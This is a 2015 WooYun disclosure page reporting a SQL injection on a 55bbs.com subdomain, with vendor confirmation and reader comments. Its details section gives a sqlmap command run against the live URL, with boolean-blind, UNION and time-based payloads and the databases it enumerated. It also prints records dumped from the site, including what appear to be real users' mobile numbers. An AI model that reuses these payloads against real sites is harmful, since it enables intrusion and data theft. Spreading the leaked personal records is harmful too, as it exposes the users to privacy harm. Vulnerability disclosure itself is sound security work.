当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114508

漏洞标题:我爱购物网SQL注入导致上百万用户手机地址等信息泄漏

相关厂商:55bbs.com

漏洞作者: #6c6c6c

提交时间:2015-05-17 10:21

修复时间:2015-05-19 14:52

公开时间:2015-05-19 14:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-17: 细节已通知厂商并且等待厂商处理中
2015-05-18: 厂商已经确认,细节仅向厂商公开
2015-05-19: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

早上骑车时不小心别到旁边宝马的车头,我摔在地上半天缓不过神,车主下车蹲在我身边失望地说:“小兄弟,你这瓷碰的不够专业啊!你躺的地方所照射的阳光并不会让司机瞬盲,而且身体与车头的直线距离太长,很难假造碰撞伤害!”
我愣住了,问他为何懂的这么多,他拍拍宝马说:“你以为它是怎么来的?”

详细说明:

activity_1072
 activity_1073
 activity_1074
 activity_1075
 activity_1076
 activity_1077
 activity_1078
 activity_1079
 activity_1080
 activity_1081
 activity_1082
 activity_1083
 activity_1084
 activity_1085
 activity_1086
 activity_1087
 activity_1088
 activity_1089
 activity_1090
 activity_1091
 activity_1092
 activity_1093
 activity_1094
 activity_1095
 activity_1096
 activity_1097
 activity_1098
 activity_1099
 activity_1100
 activity_1101
 activity_1102
 activity_1103
 activity_1104
 activity_1105
 activity_1106
 activity_1107
 activity_1108
 activity_1109
 activity_1110
 activity_1111
 activity_1112
 activity_1113
 activity_1114
 activity_1115
 activity_1116
 activity_1117
 activity_1118
 activity_1119
 activity_1120
 activity_1121
 activity_1122
 activity_1123
 activity_1124
 activity_1125
 activity_1126
 activity_1127
 activity_1128
 activity_1129
 activity_1130
 activity_1131
 activity_1132
 activity_1133
 activity_1134
 activity_1135
 activity_1136
 activity_1137
 activity_1138
 activity_1139
 activity_1140
 activity_1141
 activity_1142
 activity_1143
 activity_1144
 activity_1145
 activity_1146
 activity_1147
 activity_1148
 activity_1149
 activity_1150
 activity_1151
 activity_1152
 activity_1153
 activity_1154
 activity_1155
 activity_1156
 activity_1157
 activity_1158
 activity_1159
 activity_1160
 activity_1161
 activity_1162
 activity_1163
 activity_1164
 activity_1165
 activity_1166
 activity_1167
 activity_1168
 activity_1169
 activity_1170
 activity_1171
 activity_1172
 activity_1173
 activity_1174
 activity_1175
 activity_1176
 activity_1177
 activity_1178
 activity_1179
 activity_1180
 activity_1181
 activity_1182
 activity_1183
 activity_1184
 activity_1185
 activity_1186
 activity_1187
 activity_1188
 activity_1189
 activity_1190
 activity_1191
 activity_1192
 activity_1193
 activity_1194
 activity_1195
 activity_1196
 activity_1197
 activity_1198
 activity_1199
 activity_1200
 activity_1201
 activity_1202
 activity_1203
 activity_1204
 activity_1205
 activity_1206
 activity_1207
 activity_1208
 activity_1209
 activity_1210
 activity_1211
 activity_1212
 activity_1213
 activity_1214
 activity_1215
 activity_1216
 activity_1217
 activity_1218
 activity_1219
 activity_122
 activity_1220
 activity_1221
 activity_1222
 activity_1223
 activity_1224
 activity_1225
 activity_1226
 activity_1227
 activity_1228
 activity_1229
 activity_1230
 activity_1231
 activity_1232
 activity_1233
 activity_1234
 activity_1235
 activity_1236
 activity_1237
 activity_1238
 activity_1239
 activity_1240
 activity_1241
 activity_1242
 activity_1243
 activity_1244
 activity_1245
 activity_1246
 activity_1247
 activity_1248
 activity_1249
 activity_1250
 activity_1251
 activity_1252
 activity_1253
 activity_1254
 activity_1255
 activity_1256
 activity_1257
 activity_1258
 activity_1259
 activity_1260
 activity_1261
 activity_1262
 activity_1263
 activity_1264
 activity_1265
 activity_1266
 activity_1267
 activity_1268
 activity_1269
 activity_1270
 activity_1271
 activity_1272
 activity_1273
 activity_1274
 activity_1275
 activity_1276
 activity_1277
 activity_1278
 activity_1279
 activity_1280
 activity_1281


这种表看了一下都是用户名字信息等。

Data Found: userinfo_id=62889
Data Found: Address=
Data Found: mobile=13811816153
Data Found: userinfo_id=106550
Data Found: Address=
Data Found: mobile=13910892801
Data Found: userinfo_id=150607


随便列几条,由于这种表太多了,我就稍微跑了一点点

F:\Python26\sqlmap>sqlmap.py -u "http://liren.55bbs.com/files/panteneclinicare/s
how.php?uid=490614" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 19:54:11
[19:54:11] [WARNING] using 'C:\Users\Administrator\.sqlmap\output' as the output
 directory
[19:54:12] [INFO] resuming back-end DBMS 'mysql'
[19:54:12] [INFO] testing connection to the target URL
[19:54:12] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: uid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uid=490614' AND 4288=4288 AND 'YuWU'='YuWU
    Type: UNION query
    Title: MySQL UNION query (NULL) - 17 columns
    Payload: uid=-8983' UNION ALL SELECT NULL,CONCAT(0x71796f7471,0x4d6e4d4b7a57
666f4566,0x7170637571),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=490614' AND SLEEP(5) AND 'Elkx'='Elkx
---
[19:54:12] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.25, PHP 5.3.27
back-end DBMS: MySQL 5.0.11
[19:54:12] [INFO] fetching database names
[19:54:12] [INFO] the SQL query used returns 3 entries
[19:54:12] [INFO] resumed: "information_schema","information_schema"
[19:54:12] [INFO] resumed: "55user","55user"
[19:54:12] [INFO] resumed: "test","test"
available databases [3]:
[*] 55user
[*] information_schema
[*] test
[19:54:12] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\liren.55bbs.com'
[*] shutting down at 19:54:12


加起来就像紫霞仙子说的一样,应该有上百万,可惜你们没标记是男是女。

漏洞证明:

修复方案:

过滤

版权声明:转载请注明来源 #6c6c6c@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-18 11:21

厂商回复:

漏洞存在,等待修复

最新状态:

2015-05-19:漏洞已经修复

漏洞评价:

评论

  1. 2015-05-17 10:31 | XXXQQ ( 实习白帽子 | Rank:88 漏洞数:19 | 一个傻子)

    漏洞作者

  2. 2015-05-17 12:16 | 戏游人生 ( 路人 | Rank:9 漏洞数:4 | 热爱研究,喜欢结交同道友人!)

    我叫前排

  3. 2015-05-20 11:44 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    漏洞作者

  4. 2015-05-21 19:11 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    为什么不在文章里面@我